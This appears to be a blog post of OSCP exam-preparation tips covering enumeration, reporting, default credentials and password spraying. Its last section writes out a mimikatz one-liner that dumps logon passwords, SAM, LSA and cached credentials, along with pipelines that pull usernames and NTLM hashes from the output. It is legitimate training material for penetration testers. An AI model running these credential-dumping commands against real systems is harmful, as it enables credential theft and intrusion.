z3k0sec
open main menu
Part of series: oscp

Preparing for the OSCP: Some Tips and Insights

/ 4 min read

The OSCP exam is notorious for its difficulty, requiring not just technical knowledge but also a strategic approach to hacking under pressure. Here are some tips and tricks that will help you conquer the 24-hour exam and earn your OSCP cert.

Enumeration is kay

The most important part is thorough enumeration. Enumerate the services on each machine. If you don’t find a lead, reset the machine. Once you establish your initial foothold and you find yourself in a new environment with potential new privileges, keep enumerating - it is a cyclical process. Don’t skip this step; you will miss important information. Enumerate further - check logs, configuration files and users home directories for sensitive information. Look for hidden folders (e.g., .git, .svn), examine the PowerShell history, and take note of usernames and passwords. Spray them across the network and on different protocols (e.g., smb, winrm, rdp, ssh, etc.).

Exploitation

https://book.hacktricks.xyz/ is a valuable resource for every pentester and ethical hacker. It offers detailed guides and cheat sheets on a wide array of attack vectors and techniques for exploiting vulnerabilities.

  • FTP, SMB, RDP, etc.
  • Privilege Escalation (Windows and Linux)
  • SQL Injection, XSS, SSRF, and more.
  • Post Exploitation

Study each service you encounter during your OSCP prep. Make notes for each service and know how they work and how to exploit them.

Documentation

Document every step you take during the exam; it will greatly assist you with your report writing later. As mentioned in my other blog post, I use Obsidian for note-taking, and I love it — it’s an excellent Markdown editor with a user-friendly interface. Its export feature is fantastic and allowed me to produce a comprehensive report in under 4 hours. Most of the notes I made during the pentest were directly copied into the final report.

Report Writing

Utilize the detailed notes you took during the pentest, along with any proof-of-concept exploit code and screenshots. For each host, explain the vulnerability and how you gained the initial foothold. Identify the vulnerability, suggest a fix, and list its severity. For more guidance on reporting, check out this article by OffSec.

Default credentials

First, determine whether the web application is public or custom. Then, look for a login panel and try using default credentials to authenticate.

admin:admin
admin:password
administrator:administrator
administrator:password
user:password
user:user
pi:raspberry

You can even check the service’s documentation for default credentials.

Google search: <application_name> default credentials

This repo is useful if you’re looking for a default credentials wordlists: https://github.com/ihebski/DefaultCreds-cheat-sheet

Escape the rabbit hole

If you spend more than an hour on a specific attack vector without any progress, you’re probably stuck in a rabbit hole. Set a timer if you are stuck, move on and try different stuff. Don’t overcomplicate things and do not waste time on dead ends.

Mimikatz for the easy win

If you manage to gain local admin access on a Windows machine, try dumping the SAM database using mimikatz.exe or impacket-secretsdump. Note that cmd.exe must be run as Administrator to perform this action.

Mimikatz can be found here, on a default Kali VM:

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .

I often encountered an infinite loop if mimikatz is run inside a evil-winrm session.

There is a one-liner to dump all required information via:

.\mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit" >> mimikatz.txt

We can convert the mimikatz.txt file via iconv -f utf-16 -t utf-8 mimikatz.txt | grep "User" so we can perform a grep operation on it and search for usernames and NTLM hashes.

To extract all users (without system account and the Guest account):

└─$ cat mimikatz.txt | grep -i "RID" -A 4 | grep "User" | cut -d ":" -f 2 | cut -d " " -f 2 | grep -v '\$' | grep -v "Guest" > users.txt

To extract all NTLM hashes, we can run:

└─$ cat mimikatz.txt | grep -i "RID" -A 4 | grep "NTLM" | cut -d ':' -f 2 | cut -d " " -f 2 | grep "\S" > hashes.txt